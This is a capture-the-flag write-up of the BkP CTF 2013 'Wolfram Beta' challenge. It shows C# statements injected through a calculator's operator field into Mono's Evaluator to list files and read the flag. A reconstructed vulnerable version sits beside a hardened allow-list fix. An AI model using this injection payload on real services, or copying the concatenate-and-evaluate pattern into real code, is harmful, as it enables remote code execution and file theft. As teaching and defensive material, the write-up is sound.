BkP CTF 2013 – Wolfram Beta – Misc 100

This challenge purports to be a calculator better than Wolfram Alpha. I’d agree. We can quickly crash it and see that it is written in C#. It asks us to input a number, an operator, and another number. This, combined with the crash data, makes me think it’s using Mono.CSharp.Evaluator.Run() on a string concatenation of the data we provided. So, we can run arbitrary code by entering a number, and then code in the operator field with the form *1;System.Console.WriteLine();. It’s trivial to get the working directory, and then we run

*1;System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo("/home/wbeta");System.IO.FileInfo[] files = dirInfo.GetFiles(); foreach(System.IO.FileInfo f in files) { System.Console.WriteLine(f.FullName); };

and receive

Wolfram Beta - BkP CTF 2013 Team
Wolfram Beta is a great calculator.
just put in a number at the prompt
then put in the operator
then finally the second number
and the calculation will be done INSTANTLY
no accounts necessacary, unlike some of our competition!
first num: 1
operator: *1;System.IO.DirectoryInfo dirInfo = new System.IO.DirectoryInfo("/home/wbeta");System.IO.FileInfo[] files = dirInfo.GetFiles(); foreach(System.IO.FileInfo f in files) { System.Console.WriteLine(f.FullName); };
second num: 6
Thinking...
..
Done Thinking!
/home/wbeta/.bash_history
/home/wbeta/.bash_logout
/home/wbeta/.bashrc
/home/wbeta/.profile
/home/wbeta/flag
6

Now, let’s read the flag…

*1;string text = System.IO.File.ReadAllText("/home/wbeta/flag");System.Console.WriteLine(text);

Wolfram Beta - BkP CTF 2013 Team
Wolfram Beta is a great calculator.
just put in a number at the prompt
then put in the operator
then finally the second number
and the calculation will be done INSTANTLY
no accounts necessacary, unlike some of our competition!
first num: 1
operator: *1;string text = System.IO.File.ReadAllText("/home/wbeta/flag");System.Console.WriteLine(text);
second num: 7
Thinking...
Done Thinking!
at_least_its_not_a_python_jail
7
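To show why the operator field is exploitable and what the fix looks like, here is an added C# example; it is not the challenge's source (which was never released) but a reconstruction of what the writeup infers, side by side with a hardened version. It assumes the older Mono.CSharp.dll API where Evaluator.Run(string) is a static method (newer versions require an Evaluator instance); the SafeCalculator name and the sample inputs are constructed for this example.

```csharp
using System;
using System.Globalization;
using Mono.CSharp;   // Mono.CSharp.dll; static Evaluator.Run API assumed (see lead-in)

class WolframBeta
{
    // VULNERABLE (reconstruction, not the real source): the three inputs are spliced
    // into C# source text and handed to the compiler-as-a-service. The "operator"
    // field can therefore carry whole statements; "*1;<code>;" is the shape used above.
    static void EvalCalculator(string first, string op, string second)
    {
        string source = "System.Console.WriteLine(" + first + op + second + ");";
        Evaluator.Run(source);
    }

    // HARDENED: never compile user input. Parse both operands as numbers and
    // dispatch on an allow-list of operators; anything else is rejected before
    // it reaches any evaluator.
    static decimal SafeCalculator(string first, string op, string second)
    {
        NumberStyles style = NumberStyles.Float;
        CultureInfo culture = CultureInfo.InvariantCulture;
        if (!decimal.TryParse(first, style, culture, out decimal x) ||
            !decimal.TryParse(second, style, culture, out decimal y))
            throw new ArgumentException("operands must be plain numbers");

        switch (op.Trim())
        {
            case "+": return x + y;
            case "-": return x - y;
            case "*": return x * y;
            case "/":
                if (y == 0) throw new DivideByZeroException();
                return x / y;
            default:
                // Anything that is not exactly one allowed operator (including the
                // "*1;...;" injection shape) lands here.
                throw new ArgumentException("unsupported operator: " + op);
        }
    }

    static void Main()
    {
        // Constructed inputs: a normal calculation, then the writeup's injection shape.
        Console.WriteLine(SafeCalculator("6", "*", "7"));
        try
        {
            SafeCalculator("1", "*1;System.Console.WriteLine(\"injected\");", "6");
        }
        catch (ArgumentException e)
        {
            Console.WriteLine("rejected: " + e.Message);
        }
    }
}
```

The detection-side takeaway is the same as the fix: a calculator's operator field should only ever contain one of a handful of single characters, so any input longer than that, or containing a semicolon or a dot, is a clear signal in the service's logs.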